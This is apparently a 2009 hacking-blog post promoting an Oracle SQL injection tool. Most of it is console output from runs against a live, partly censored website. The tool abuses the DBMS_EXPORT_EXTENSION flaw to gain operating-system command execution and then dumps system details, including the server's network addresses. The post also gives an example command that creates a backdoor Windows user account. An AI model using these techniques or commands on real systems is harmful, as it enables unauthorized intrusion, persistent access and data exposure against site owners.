After successfully developed POSTGRESQL injection tool,darkc0de will release new tool for Oracle SQL injection. If you ever heard about darkMYSQLi, darkMSSQLi, or darkPGSQLi, i think this tool is useful for you all especially penetration testers or security consultants. This tool 80% working and will be released later.
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=1001039735'" --pwn
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|
[+] URL: https://[somevulnsite]/detail.jsp?id=1001039735'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...
Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:
[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]
[+] If all OK you should now can exec command with --cmd option
[+] Example:
[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"
[+] UNIX/Linux
[+] --cmd "/bin/uname -a"
--cmd "/bin/uname -a"
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/bin/uname -a"
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|
[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...
Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
[+] Do we have Access to Oracle Database: NO
[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!
[+] Executing OS command from the server
[+] Number of Command Lines: 1
$ /bin/uname -a
Linux asahan 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux
[-] 10:46:55
[-] Total URL Requests: 5
[-] Done
Don't forget to check darkORASQLi.log
--cmd "/sbin/ifconfig"
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/sbin/ifconfig"
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|
[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...
Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
[+] Do we have Access to Oracle Database: NO
[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!
[+] Executing OS command from the server
[+] Number of Command Lines: 1
$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DC
inet addr:10.100.88.31 Bcast:10.100.88.255 Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201
eth1 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)
[-] 10:34:04
[-] Total URL Requests: 5
[-] Done
Don't forget to check darkORASQLi.log
20% to go.. till then, keep r0x darkc0de!
Sunday, November 29, 2009
Subscribe to:
Post Comments (Atom)
Posts
No comments:
Post a Comment